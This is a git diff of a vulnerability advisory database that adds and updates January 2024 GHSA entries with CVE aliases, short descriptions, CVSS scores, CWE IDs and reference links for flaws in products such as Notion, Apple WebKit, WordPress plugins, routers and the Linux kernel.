a/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json b/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json index 0ce54e5298b7b..a4ab33a65cc12 100644 --- a/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json +++ b/advisories/unreviewed/2024/01/GHSA-3h2h-j4vg-8xm8/GHSA-3h2h-j4vg-8xm8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3h2h-j4vg-8xm8", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23743" ], "details": "An issue in Notion for macOS version 3.1.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T02:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json b/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json index 4143639a1d71a..25fd0ca670ba2 100644 --- a/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json +++ b/advisories/unreviewed/2024/01/GHSA-3h6x-952r-xr8p/GHSA-3h6x-952r-xr8p.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3h6x-952r-xr8p", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23213" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -65,13 +68,17 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Jan/40" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json b/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json new file mode 100644 index 0000000000000..27d33021e9b21 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3hv7-66gj-8929/GHSA-3hv7-66gj-8929.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3hv7-66gj-8929", + "modified": "2024-02-03T00:31:32Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6390" + ], + "details": "The WordPress Users WordPress plugin through 1.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6390" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/2023-6390.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/a0ca68d3-f885-46c9-9f6b-b77ad387d25d/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json b/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json index ef473bdb6873f..c71634c97f7c9 100644 --- a/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json +++ b/advisories/unreviewed/2024/01/GHSA-3jcf-xpxj-7444/GHSA-3jcf-xpxj-7444.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json b/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json index f31f366021e61..ca4e53f89eb3c 100644 --- a/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json +++ b/advisories/unreviewed/2024/01/GHSA-3mv9-fmvf-xvmx/GHSA-3mv9-fmvf-xvmx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3mv9-fmvf-xvmx", - "modified": "2024-01-19T15:30:20Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-19T15:30:20Z", "aliases": [ "CVE-2022-40700" diff --git a/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json new file mode 100644 index 0000000000000..fd33d77d53224 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qmj-w5mh-5gv3", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24329" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24329" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json b/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json index 5708a0e3b70a7..7d021cdd26797 100644 --- a/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json +++ b/advisories/unreviewed/2024/01/GHSA-3qxp-wv2v-jfc4/GHSA-3qxp-wv2v-jfc4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3qxp-wv2v-jfc4", - "modified": "2024-01-09T18:30:29Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-09T18:30:29Z", "aliases": [ "CVE-2024-21312" @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21312" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0008/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json index fc1235f6d288b..b8175ff5924bc 100644 --- a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json +++ b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3qxr-cm3w-hpmq", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2024-0618" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json b/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json new file mode 100644 index 0000000000000..b3a938a2a6380 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3r8w-gj6v-wq3r/GHSA-3r8w-gj6v-wq3r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3r8w-gj6v-wq3r", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2023-50166" + ], + "details": "Pega Platform from 8.5.4 to 8.8.3 is affected by an XSS issue with an unauthenticated user and the redirect parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50166" + }, + { + "type": "WEB", + "url": "https://support.pega.com/support-doc/pega-security-advisory-h23-vulnerability-remediation-note" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json b/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json new file mode 100644 index 0000000000000..72778ee6cae61 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3rhq-47cj-h9g4/GHSA-3rhq-47cj-h9g4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rhq-47cj-h9g4", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-21388" + ], + "details": "Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21388" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21388" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json b/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json new file mode 100644 index 0000000000000..ba3074d33351e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3rjg-ff6r-x2c7/GHSA-3rjg-ff6r-x2c7.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rjg-ff6r-x2c7", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-1099" + ], + "details": "A vulnerability was found in Rebuild up to 3.5.5. It has been classified as problematic. Affected is the function getFileOfData of the file /filex/read-raw. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252456.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1099" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252456" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json b/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json index 6393340b0ff84..43c6c2b926ab8 100644 --- a/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json +++ b/advisories/unreviewed/2024/01/GHSA-3rv5-pgj2-5frg/GHSA-3rv5-pgj2-5frg.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json b/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json index c4f282e5478b4..6d28964ec6467 100644 --- a/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json +++ b/advisories/unreviewed/2024/01/GHSA-3v3p-g3ch-4rcq/GHSA-3v3p-g3ch-4rcq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3v3p-g3ch-4rcq", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48132" ], "details": "An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:58Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json b/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json index 3f0e1ec337adc..dd5d74f6b55a5 100644 --- a/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json +++ b/advisories/unreviewed/2024/01/GHSA-3w6g-cv32-6cpq/GHSA-3w6g-cv32-6cpq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3w6g-cv32-6cpq", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-43584" ], "details": "DOM-based Cross Site Scripting (XSS vulnerability in 'Tail Event Logs' functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4.0 allows attackers to run arbitrary code via the name element when filtering for a log.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T20:15:53Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json b/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json index 5bac325abf6ec..2eb4ee6acc181 100644 --- a/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json +++ b/advisories/unreviewed/2024/01/GHSA-3w6h-g7wc-c8rx/GHSA-3w6h-g7wc-c8rx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3w6h-g7wc-c8rx", - "modified": "2024-01-20T06:30:25Z", + "modified": "2024-01-29T15:30:23Z", "published": "2024-01-20T06:30:25Z", "aliases": [ "CVE-2023-46447" ], "details": "The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-20T05:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json b/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json new file mode 100644 index 0000000000000..9e430ce24983c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3w6w-r9vq-3r79/GHSA-3w6w-r9vq-3r79.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w6w-r9vq-3r79", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2024-22569" + ], + "details": "Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22569" + }, + { + "type": "WEB", + "url": "https://github.com/Num-Nine/CVE/issues/12" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T02:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json b/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json new file mode 100644 index 0000000000000..67b18afff4d1f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3wf6-8fcq-f34q/GHSA-3wf6-8fcq-f34q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3wf6-8fcq-f34q", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6278" + ], + "details": "The Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo WordPress plugin before 2.2.25 does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6278" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/dfe5001f-31b9-4de2-a240-f7f5a992ac49/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json b/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json new file mode 100644 index 0000000000000..44864083a554a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-3xpr-x643-29v6/GHSA-3xpr-x643-29v6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xpr-x643-29v6", + "modified": "2024-01-31T15:30:19Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2024-1085" + ], + "details": "A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability.\n\nWe recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1085" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" + }, + { + "type": "WEB", + "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json b/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json index 90239d2bce32c..fcbfc5601d368 100644 --- a/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json +++ b/advisories/unreviewed/2024/01/GHSA-4287-v2hm-q9f2/GHSA-4287-v2hm-q9f2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4287-v2hm-q9f2", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23214" ], "details": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json b/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json new file mode 100644 index 0000000000000..4a79f2a2c3018 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-43fw-h62p-gjw8/GHSA-43fw-h62p-gjw8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43fw-h62p-gjw8", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2023-50165" + ], + "details": "Pega Platform versions 8.2.1 to Infinity 23.1.0 are affected by an Generated PDF issue that could expose file contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50165" + }, + { + "type": "WEB", + "url": "https://support.pega.com/support-doc/pega-security-advisory-g23-vulnerability-remediation-note" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json b/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json index 4709eda093169..e2e6e42eb1891 100644 --- a/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json +++ b/advisories/unreviewed/2024/01/GHSA-43xx-wfwg-ffh4/GHSA-43xx-wfwg-ffh4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-43xx-wfwg-ffh4", - "modified": "2024-01-28T06:30:28Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T06:30:28Z", "aliases": [ "CVE-2024-23740" ], "details": "An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T04:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json b/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json index 1d76d8714b28c..13d5c3841df0c 100644 --- a/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json +++ b/advisories/unreviewed/2024/01/GHSA-4425-3v92-m6q6/GHSA-4425-3v92-m6q6.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json b/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json index 909725e38ee7f..00c9245910104 100644 --- a/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json +++ b/advisories/unreviewed/2024/01/GHSA-445f-cm55-gq8v/GHSA-445f-cm55-gq8v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-445f-cm55-gq8v", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-01-30T21:30:29Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2024-22751" ], "details": "D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json index 364465b4cc181..e2773757ce6b3 100644 --- a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json +++ b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-44qm-928x-6p3g", - "modified": "2024-01-02T06:30:31Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-02T06:30:31Z", "aliases": [ "CVE-2023-47039" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249525" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0005/" } ], "database_specific": { diff --git 